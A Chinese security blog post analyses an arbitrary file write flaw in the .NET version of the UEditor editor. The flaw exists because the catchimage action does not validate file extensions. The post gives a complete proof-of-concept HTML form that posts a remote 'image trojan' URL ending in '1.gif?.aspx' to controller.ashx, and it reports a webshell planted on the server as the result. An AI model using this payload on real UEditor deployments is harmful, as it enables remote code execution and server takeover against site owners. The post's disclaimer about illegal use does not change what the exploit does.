News:禁止使用本博客的技术文章、源码、工具等用于非法用途,否则后果自负。

UEditor编辑器两个版本任意文件上传漏洞分析

jasonx 531 0 条

前言

UEditor是一款所见即所得的开源富文本编辑器,具有轻量、可定制、用户体验优秀等特点,被广大WEB应用程序所使用。本次爆出的高危漏洞属于.NET版本,其它的版本暂时不受影响。漏洞成因是在抓取远程数据源的时候未对文件后缀名做验证导致任意文件写入漏洞,黑客利用此漏洞可以在服务器上执行任意指令,综合评级高危。由于时间仓促,本文分析不到位的地方还请多多谅解。

漏洞利用

笔者本地测试的编辑器是官方下载最新的版本1.4.3.3 http://ueditor.baidu.com/website/download.html

1.png

本地构造一个html,因为不是上传漏洞所以enctype 不需要指定为multipart/form-data , 之前见到有poc指定了这个值。完整的poc如下

<form action="http://xxxxxxxxx/controller.ashx?action=catchimage"enctype="application/x-www-form-urlencoded"  method="POST">

  <p>shell addr:<input type="text" name="source[]" /></p >

  <inputtype="submit" value="Submit" />

</form>

需准备一个图片马儿,远程shell地址需要指定扩展名为 1.gif?.aspx

2.png

成功返回webshell

3.png

与本文相关的文章

发表我的评论

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址